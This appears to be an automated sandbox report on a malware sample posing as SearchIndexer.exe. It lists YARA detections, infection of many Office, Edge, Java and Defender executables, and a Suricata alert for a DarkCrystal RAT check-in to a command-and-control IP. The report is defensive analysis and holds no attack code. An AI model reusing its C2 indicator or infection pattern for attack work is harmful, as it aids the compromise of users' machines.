Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe, type: DROPPED

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Users\user\AppData\Local\Temp\chrome.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe	Jump to behavior

Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Config\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 37.44.238.250:80

